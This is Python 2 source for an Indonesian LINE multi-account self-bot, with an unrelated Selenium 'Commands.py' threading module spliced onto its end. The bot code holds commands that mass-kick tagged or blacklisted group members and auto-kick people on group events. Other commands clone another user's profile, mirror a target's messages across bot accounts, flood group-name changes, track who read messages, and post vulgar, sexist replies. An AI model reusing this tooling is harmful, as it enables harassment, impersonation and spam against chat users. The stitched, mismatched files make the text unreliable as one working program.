elif "youtube " in msg.text.lower():
if msg.from_ in admin:
query = msg.text.split(" ")
try:
if len(query) == 3:
isi = yt(query[2])
hasil = isi[int(query[1])-1]
cl.sendText(msg.to, hasil)
else:
isi = yt(query[1])
cl.sendText(msg.to, isi[0])
except Exception as e:
cl.sendText(msg.to, str(e))
elif 'Vidio ' in msg.text:
if msg.from_ in admin:
try:
textToSearch = (msg.text).replace('Vidio ', "").strip()
query = urllib.quote(textToSearch)
url = "https://www.youtube.com/results?search_query=" + query
response = urllib2.urlopen(url)
html = response.read()
soup = BeautifulSoup(html, "html.parser")
results = soup.find(attrs={'class':'yt-uix-tile-link'})
ght=('https://www.youtube.com' + results['href'])
cl.sendVideoWithURL(msg.to,ght)
except:
cl.sendText(msg.to,"Could not find it")
#==========================================
elif msg.from_ in mimic["target"] and mimic["status"] == True and mimic["target"][msg.from_] == True:
text = msg.text
if text is not None:
ki.sendText(msg.to,text)
kc.sendText(msg.to,text)
kk.sendText(msg.to,text)
ks.sendText(msg.to,text)
k1.sendText(msg.to,text)
else:
if msg.contentType == 7:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "6",
"STKPKGID": "1",
"STKVER": "100" }
kk.sendMessage(msg)
ki.sendMessage(msg)
kc.sendMessage(msg)
ks.sendMessage(msg)
k1.sendMessage(msg)
elif msg.contentType == 13:
msg.contentType = 13
msg.contentMetadata = {'mid': msg.contentMetadata["mid"]}
kk.sendMessage(msg)
ki.sendMessage(msg)
k1.sendMessage(msg)
kc.sendMessage(msg)
ks.sendMessage(msg)
# elif msg.text in ["Target list"]:
# if msg.from_ in admin:
# if mimic["target"] == {}:
# cl.sendText(msg.to,"nothing")
# else:
# mc = "Target mimic user\n"
# for mi_d in mimic["target"]:
# mc += "✔️ "+cl.getContact(mi_d).displayName + "\n"
# cl.sendText(msg.to,mc)
# elif "Mimic:" in msg.text:
# if msg.from_ in admin:
# cmd = msg.text.replace("Mimic:","")
# if cmd == "on":
# if mimic["status"] == False:
# mimic["status"] = True
# cl.sendText(msg.to,"turning on mimic")
#
# else:
# cl.sendText(msg.to,"mimic have been enable")
# elif cmd == "off":
# if mimic["status"] == True:
# mimic["status"] = False
# cl.sendText(msg.to,"turning off mimic")
#
# else:
# cl.sendText(msg.to,"Mimic have been desable")
# elif "Mimic target " in cmd:
# if msg.from_ in admin:
# target0 = msg.text.replace("Mimic target ","")
# target1 = target0.lstrip()
# target2 = target1.replace("@","")
# target3 = target2.rstrip()
# _name = target3
# gInfo = cl.getGroup(msg.to)
# targets = []
# for a in gInfo.members:
# if _name == a.displayName:
# targets.append(a.mid)
# if targets == []:
# cl.sendText(msg.to,"No targets")
#
# else:
# for target in targets:
# try:
# mimic["target"][target] = True
# cl.sendText(msg.to,"Success added target")
#
# #cl.sendMessageWithMention(msg.to,target)
# break
# except:
# cl.sendText(msg.to,"Failed")
#
# break
# elif "Untarget " in cmd:
# if msg.from_ in admin:
# target0 = msg.text.replace("Untarget ","")
# target1 = target0.lstrip()
# target2 = target1.replace("@","")
# target3 = target2.rstrip()
# _name = target3
# gInfo = cl.getGroup(msg.to)
# gInfo = ki.getGroup(msg.to)
# targets = []
# for a in gInfo.members:
# if _name == a.displayName:
# targets.append(a.mid)
# if targets == []:
# cl.sendText(msg.to,"No targets")
# else:
# for target in targets:
# try:
# del mimic["target"][target]
# cl.sendText(msg.to,"Success deleted target")
#cl.sendMessageWithMention(msg.to,target)
# break
# except:
# cl.sendText(msg.to,"Failed!")
#==========================================
elif msg.text in ["Mimic on","mimic on","Mimic:on"]:
if msg.from_ in admin:
if wait3["copy"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on")
else:
cl.sendText(msg.to,"Mimic On")
else:
wait3["copy"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Mimic On")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Mimic off","mimic off","Mimic:off"]:
if msg.from_ in admin:
if wait3["copy"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on")
else:
cl.sendText(msg.to,"Mimic Off")
else:
wait3["copy"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Mimic Off")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Target list","Targetlist"]:
if msg.from_ in admin:
if wait3["target"] == {}:
cl.sendText(msg.to,"nothing")
else:
mc = "Target mimic user\n"
for mi_d in wait3["target"]:
mc += "✔️ "+cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif "Mimic target " in msg.text:
if msg.from_ in admin:
if wait3["copy"] == True:
siapa = msg.text.replace("Mimic target ","")
if siapa.rstrip(' ') == "me":
wait3["copy2"] = "me"
cl.sendText(msg.to,"Mimic change to me")
elif siapa.rstrip(' ') == "target":
wait3["copy2"] = "target"
cl.sendText(msg.to,"Mimic change to target")
else:
cl.sendText(msg.to,"I dont know")
elif "Target @" in msg.text:
if msg.from_ in admin:
target = msg.text.replace("Target @","")
gc = cl.getGroup(msg.to)
targets = []
for member in gc.members:
if member.displayName == target.rstrip(' '):
targets.append(member.mid)
if targets == []:
cl.sendText(msg.to, "User not found")
else:
for t in targets:
wait3["target"][t] = True
cl.sendText(msg.to,"Target added")
elif "Del target @" in msg.text:
if msg.from_ in admin:
target = msg.text.replace("Del target @","")
gc = cl.getGroup(msg.to)
targets = []
for member in gc.members:
if member.displayName == target.rstrip(' '):
targets.append(member.mid)
if targets == []:
cl.sendText(msg.to, "User not found")
else:
for t in targets:
del wait3["target"][t]
cl.sendText(msg.to,"Target deleted")
#==========================================
#----------------------------------------------
elif "copy @" in msg.text:
if msg.from_ in admin:
print "[COPY] Ok"
_name = msg.text.replace("copy @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
cl.CloneContactProfile(target)
cl.sendText(msg.to, "Copied.")
except Exception as e:
print e
#-----------------------------------------------
elif msg.text in ["Backup","backup"]:
if msg.from_ in admin:
try:
cl.updateDisplayPicture(backup.pictureStatus)
cl.updateProfile(backup)
cl.sendText(msg.to, "Refreshed.")
except Exception as e:
cl.sendText(msg.to, str(e))
elif "rejectall" in msg.text:
X = cl.getGroupIdsInvited()
for i in X:
cl.rejectGroupInvitation(i)
#--------------------------------------------------------
#-------------Fungsi Balesan Respon Start---------------------#
elif msg.text in ["Ini Apa","ini apa","Apaan Ini","apaan ini"]:
ki.sendText(msg.to,"Ya gitu deh intinya mah questioning")
#-------------Fungsi Balesan Respon Finish---------------------#
elif ("Vkick" in msg.text):
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
except:
cl.sendText(msg.to,"Error")
#-------------Fungsi Speedbot Start---------------------#
elif msg.text in ["Speed","Sp"]:
if msg.from_ in admin:
print("Speed")
start = time.time()
cl.sendText(msg.to, "Sabar Boss...")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sDetik" % (elapsed_time))
ki.sendText(msg.to, "%sDetik" % (elapsed_time))
kc.sendText(msg.to, "%sDetik" % (elapsed_time))
k1.sendText(msg.to, "%sDetik" % (elapsed_time))
#-------------Fungsi Speedbot Finish--------------------#
elif "Recover" in msg.text:
thisgroup = cl.getGroups([msg.to])
Mids = [contact.mid for contact in thisgroup[0].members]
mi_d = Mids[:33]
cl.createGroup("Recover", mi_d)
cl.sendText(msg.to,"Success recover")
#--------------------------------------------------------
#--------------------------------------------------------
elif msg.text in ["Remove all chat"]:
if msg.from_ in admin:
cl.removeAllMessages(op.param2)
ki.removeAllMessages(op.param2)
kk.removeAllMessages(op.param2)
kc.removeAllMessages(op.param2)
ks.removeAllMessages(op.param2)
k1.removeAllMessages(op.param2)
k2.removeAllMessages(op.param2)
k3.removeAllMessages(op.param2)
k4.removeAllMessages(op.param2)
k5.removeAllMessages(op.param2)
cl.sendText(msg.to,"Removed all chat")
#---------------------------
#KICK_BY_TAG
elif "Boom " in msg.text:
if msg.from_ in admin:
                    if 'MENTION' in msg.contentMetadata.keys():
names = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
print mentionees
for mention in mentionees:
ki.kickoutFromGroup(msg.to,[mention['M']])
else:
cl.sendText(msg.to, "Khusus Admin")
#-------------Fungsi Banned Send Contact Start------------------#
elif msg.text in ["Ban"]:
if msg.from_ in admin:
wait["wblacklist"] = True
cl.sendText(msg.to,"Kirim contact")
ki.sendText(msg.to,"Kirim contact")
#kk.sendText(msg.to,"Kirim contact")
kc.sendText(msg.to,"Kirim contact")
elif msg.text in ["Unban"]:
if msg.from_ in admin:
wait["dblacklist"] = True
cl.sendText(msg.to,"Kirim contact")
ki.sendText(msg.to,"Kirim contact")
#kk.sendText(msg.to,"Kirim contact")
kc.sendText(msg.to,"Kirim contact")
#-------------Fungsi Banned Send Contact Finish------------------#
#-------------Fungsi Chat ----------------
elif msg.text in ["Woy","woy","Woi","woi"]:
quote = ['Istri yang baik itu Istri yang Mengizinkan Suaminya untuk Poligami 😂😂😂.','Kunci Untuk Bikin Suami Bahagia itu cuma satu..\nIzinkan Suamimu Untuk Selingkuh Coyyy ','Ah Koplak Lu','Muka Lu Kaya Jembut','Ada Orang kah disini?','Ada Janda Yang Bisa Di Ajak Mojok Gak, Euy','Ada Perawan Nganggur ga Coy?']
psn = random.choice(quote)
cl.sendText(msg.to,psn)
#-------------Fungsi Bannlist Start------------------#
elif msg.text in ["Banlist"]:
if msg.from_ in admin:
if wait["blacklist"] == {}:
random.choice(KAC).sendText(msg.to,"Tidak Ada Akun Terbanned")
else:
random.choice(KAC).sendText(msg.to,"Blacklist user")
mc = ""
for mi_d in wait["blacklist"]:
mc += "->" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
#-------------Fungsi Bannlist Finish------------------#
elif msg.text in ["Cek ban"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
cocoa = ""
for mm in matched_list:
cocoa += mm + "\n"
random.choice(KAC).sendText(msg.to,cocoa + "")
elif msg.text in ["Kill ban"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
random.choice(KAC).sendText(msg.to,"There was no blacklist user")
random.choice(KAC).sendText(msg.to,"There was no blacklist user")
random.choice(KAC).sendText(msg.to,"There was no blacklist user")
random.choice(KAC).sendText(msg.to,"There was no blacklist user")
return
for jj in matched_list:
random.choice(KAC).kickoutFromGroup(msg.to,[jj])
random.choice(KAC).kickoutFromGroup(msg.to,[jj])
random.choice(KAC).kickoutFromGroup(msg.to,[jj])
random.choice(KAC).kickoutFromGroup(msg.to,[jj])
random.choice(KAC).sendText(msg.to,"Blacklist emang pantas tuk di usir")
random.choice(KAC).sendText(msg.to,"Blacklist emang pantas tuk di usir")
random.choice(KAC).sendText(msg.to,"Blacklist emang pantas tuk di usir")
random.choice(KAC).sendText(msg.to,"Blacklist emang pantas tuk di usir")
elif msg.text in ["Clear"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
cl.cancelGroupInvitation(msg.to,[_mid])
cl.sendText(msg.to,"I pretended to cancel and canceled.")
elif "random: " in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
strnum = msg.text.replace("random: ","")
source_str = 'abcdefghijklmnopqrstuvwxyz1234567890@:;./_][!&%$#)(=~^|'
try:
num = int(strnum)
group = cl.getGroup(msg.to)
for var in range(0,num):
name = "".join([random.choice(source_str) for x in xrange(10)])
time.sleep(0.01)
group.name = name
cl.updateGroup(group)
except:
cl.sendText(msg.to,"Error")
elif "albumat'" in msg.text:
try:
albumtags = msg.text.replace("albumat'","")
gid = albumtags[:6]
name = albumtags.replace(albumtags[:34],"")
cl.createAlbum(gid,name)
cl.sendText(msg.to,name + "created an album")
except:
cl.sendText(msg.to,"Error")
elif "fakecat'" in msg.text:
try:
source_str = 'abcdefghijklmnopqrstuvwxyz1234567890@:;./_][!&%$#)(=~^|'
name = "".join([random.choice(source_str) for x in xrange(10)])
anu = msg.text.replace("fakecat'","")
random.choice(KAC).sendText(msg.to,str(cl.channel.createAlbum(msg.to,name,anu)))
except Exception as e:
try:
cl.sendText(msg.to,str(e))
except:
pass
#===========================================
if op.param3 == "1":
if op.param1 in protectname:
group = cl.getGroup(op.param1)
try:
group.name = wait["pro_name"][op.param1]
cl.updateGroup(group)
cl.sendText(op.param1, "Groupname protect now")
wait["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except Exception as e:
print e
pass
#------------------------------------------------------------------------------------
if op.type == 32:
OWN = "u350cc7408cc6cc82e056ee046131f925"
if op.param2 in Bots and admin:
pass
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
contact = cl.getContact(op.param2)
ki.kickoutFromGroup(op.param1,[op.param2])
#kk.kickoutFromGroup(op.param1,[op.param2])
kc.kickoutFromGroup(op.param1,[op.param2])
ks.kickoutFromGroup(op.param1,[op.param2])
k1.kickoutFromGroup(op.param1,[op.param2])
wait["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
#===========================================
#---------CCTV-----------
if op.type == 55:
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n[•]" + Name
wait2['ROM'][op.param1][op.param2] = "[•]" + Name
else:
cl.sendText
except:
pass
#---------------------
if op.type == 17:
if op.param2 in Bots:
return
ginfo = cl.getGroup(op.param1)
random.choice(KAC).sendText(op.param1, "Welcome\nSelamat Datang Di " + str(ginfo.name))
random.choice(KAC).sendText(op.param1, "Founder =>>> " + str(ginfo.name) + " :\n" + ginfo.creator.displayName)
            #random.choice(KAC).sendText(op.param1)  # disabled: sendText() needs a message argument
print "MEMBER HAS JOIN THE GROUP"
if op.type == 15:
if op.param2 in Bots:
return
random.choice(KAC).sendText(op.param1, "Kenapa left kak")
print "MEMBER HAS LEFT THE GROUP"
#--------------------------------------------------------
#Restart_Program
elif msg.text in ["Bot restart"]:
if msg.from_ in Creator:
cl.sendText(msg.to, "Bot has been restarted")
restart_program()
print "@Restart"
else:
cl.sendText(msg.to, "No Access")
#--------------------------------------------------------
if op.type == 59:
print op
except Exception as error:
print error
def a2():
now2 = datetime.now()
nowT = datetime.strftime(now2,"%M")
if nowT[14:] in ["10","20","30","40","50","00"]:
return False
else:
return True
#def autolike():
#for zx in range(0,500):
#hasil = cl.activity(limit=500)
#if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
#try:
#cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
#cl.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
#ki.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
#ki.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Aku Juga Ikutin Boss Aku Like Status Kamu Ka\n\n Like Back yah Ka 😊")
#kk.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
#kk.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Aku Juga Ikutin Boss Aku Like Status Kamu Ka\n\n Like Back yah Ka 😊")
#kc.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
#kc.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Aku Juga Ikutin Boss Aku Like Status Kamu Ka\n\n Like Back yah Ka 😊")
#ks.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
#ks.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Aku Juga Ikutin Boss Aku Like Status Kamu Ka\n\n Like Back yah Ka 😊")
#k1.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
#k1.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Aku Juga Ikutin Boss Aku Like Status Kamu Ka\n\n Like Back yah Ka 😊")
#k2.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
#k2.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Aku Juga Ikutin Boss Aku Like Status Kamu Ka\n\n Like Back yah Ka 😊")
#k3.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
#k3.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Aku Juga Ikutin Boss Aku Like Status Kamu Ka\n\n Like Back yah Ka 😊")
#cl.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
#print "Like"
#except:
#pass
#else:
#print "Already Liked"
#time.sleep(0.01)
#thread3 = threading.Thread(target=autolike)
#thread3.daemon = True
#thread3.start()
#--------------------
#def likePost():
# for zx in range(0,500):
# hasil = cl.activity(limit=500)
# if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
#if hasil['result']['posts'][zx]['userInfo']['mid'] in owner:
#try:
#cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
#ki.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
#kk.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
#kc.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
#ks.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
#k1.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
#k2.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
#k3.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
#k4.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
#k5.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
#cl.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
#ki.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
#kk.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
#kc.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
#ks.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
#k1.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
#k2.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
#k3.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
#print "Like"
#except:
#pass
#else:
#print "Status Sudah di Like Boss"
def a2():
now2 = datetime.now()
nowT = datetime.strftime(now2,"%M")
if nowT[14:] in ["10","20","30","40","50","00"]:
return False
else:
return True
def nameUpdate():
while True:
try:
#while a2():
#pass
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"]
cl.updateProfile(profile)
profile2 = ki.getProfile()
profile2.displayName = wait["cName2"]
ki.updateProfile(profile2)
profile3 = kk.getProfile()
profile3.displayName = wait["cName3"]
kk.updateProfile(profile3)
profile4 = kc.getProfile()
profile4.displayName = wait["cName4"]
kc.updateProfile(profile4)
profile5 = ks.getProfile()
profile5.displayName = wait["cName5"]
ks.updateProfile(profile5)
time.sleep(600)
except:
pass
thread2 = threading.Thread(target=nameUpdate)
thread2.daemon = True
thread2.start()
while True:
try:
Ops = cl.fetchOps(cl.Poll.rev, 5)
except EOFError:
raise Exception("It might be wrong revision\n" + str(cl.Poll.rev))
for Op in Ops:
if (Op.type != OpType.END_OF_OPERATION):
cl.Poll.rev = max(cl.Poll.rev, Op.revision)
bot(Op)
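# The loop above long-polls fetchOps() for new operations, advances cl.Poll.rev to the
# highest revision seen so already-handled operations are not fetched again, and hands
# each operation to bot(Op) for dispatch.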
|
Commands.py
|
import logging as logging_module  # aliased: the `logging` boolean parameter below shadows this name
import threading
from ..Environment import env, env_driver
from ..Helpers import DummyLogger, DummyThread
class Kwargs(object):
"""
An object used for passing **kwargs with your *args.
Example:
@has_kwargs
def some_controller_func(first_arg, second_arg, some_arg=True, other_arg='NA'):
print first_arg, second_arg
print some_arg, other_arg
a = ('hello', 'world', Kwargs({'some_arg': 'HELLO', 'other_arg': 'WORLD!!!'}))
some_controller_func(*a)
"""
def __init__(self, dictionary):
try:
dictionary.keys()
except:
raise TypeError('Kwargs requires a dictionary, got a {}'.format(type(dictionary)))
self.dictionary = dictionary
def __len__(self):
return len(self.dictionary)
def __getitem__(self, key):
return self.dictionary[key]
def __setitem__(self, key, value):
self.dictionary[key] = value
def __delitem__(self, key):
del self.dictionary[key]
return self
def __iter__(self):
try:
for k, v in self.dictionary.iteritems():
yield k, v
except AttributeError:
for k, v in self.dictionary.items():
yield k, v
class BaseCommandFactory(object):
def __init__(self, controllers, logging=False, attach_drivers=True, wait_timeout=30, dummy_logger_prints=False,
log_file='main_log.txt'):
if type(controllers) != dict:
raise TypeError('controllers must be a dictionary of controllers.')
self.attach_drivers = attach_drivers
self.log_file = log_file
self.logging_val = logging
if logging:
            # Set up the logger (use the module alias; `logging` here is the boolean flag). #
            logging_module.basicConfig(level=logging_module.DEBUG)
            logger = logging_module.getLogger(ThreadedCommandFactory.__name__)
            # Create log handler for writing to file. #
            handler = logging_module.FileHandler(self.log_file)
            handler.setLevel(logging_module.DEBUG)
            # Create a logging format. #
            formatter = logging_module.Formatter(
                '%(asctime)s - %(name)s.%(levelname)s: %(message)s',
                datefmt='%m-%d-%Y %H:%M:%S'
            )
handler.setFormatter(formatter)
# Add the handlers to the logger.
logger.addHandler(handler)
self.logger = logger
else:
self.logger = DummyLogger(prints=dummy_logger_prints, level='DEBUG')
self.controllers = controllers
self.wait_timeout = wait_timeout
self.pool = []
if attach_drivers:
self.logger.info('Attaching drivers.')
self._attach_drivers()
self.logger.info('Drivers attached.')
def __len__(self):
return len(self.controllers)
def __setitem__(self, key, value):
self.controllers[key] = value
def __getitem__(self, item):
return self.controllers[item]
def __delitem__(self, key):
self._shutdown_driver(key)
del self.controllers[key]
def __iter__(self):
try:
for k, v in self.controllers.iteritems():
yield k, v
except AttributeError:
for k, v in self.controllers.items():
yield k, v
def _attach_drivers(self):
"""
Attach separate drivers to each controller.
:return:
"""
try:
items = self.controllers.iteritems()
except AttributeError:
items = self.controllers.items()
for key, args in items:
if 'attach_driver' in dir(args):
args.attach_driver(env_driver(env('BROWSER'))(), timeout=self.wait_timeout)
def _shutdown_driver(self, key, retry=True):
try:
self.controllers[key].driver.close()
except:
pass
try:
self.controllers[key].driver.quit()
except:
pass
if retry:
self._shutdown_driver(key, retry=False)
return self
def shutdown(self):
"""
Shut down the WebDriver instances.
:return: None
"""
try:
items = self.controllers.iteritems()
except AttributeError:
items = self.controllers.items()
for key, controller in items:
self._shutdown_driver(key)
return None
class ThreadedCommandFactory(BaseCommandFactory):
"""
Used for creating threaded commands. Each controller must use a separate instance of WebDriver.
Example:
controllers = {
'google': google_controller,
'yahoo': yahoo_controller
}
thread_manager = ThreadedControllerManager(controllers, attach_drivers=True)
"""
def create_command(self, target, command_pack):
"""
Create threads for the given target function. The command pack is used to provide args
to the target function.
Example of basic setup:
def do_login(controller, username, password):
return controller.do_login(username, password)
m = ThreadedCommandFactory({
'google': google_controller,
'bing': bing_controller
}
)
        do_login_command = {
'google': ('google_username', 'google_password'),
'bing': ('bing_username', 'bing_password')
}
cmd = m.create_command(do_login, do_login_command)
cmd.start()
:param target: function
:param command_pack: dict
:return: Command
"""
if type(command_pack) != dict:
raise TypeError('Expected a dictionary for the command_pack variable.')
self.logger.info('Creating threads.')
try:
items = command_pack.iteritems()
except AttributeError:
items = command_pack.items()
for key, args in items:
args = (self.controllers[key],) + args
thread = threading.Thread(target=target, args=args)
self.pool.append(thread)
# Swap variables.
thread_pool, self.pool = self.pool, []
return Command(self.logging_val, thread_pool, log_file=self.log_file)
class CommandFactory(BaseCommandFactory):
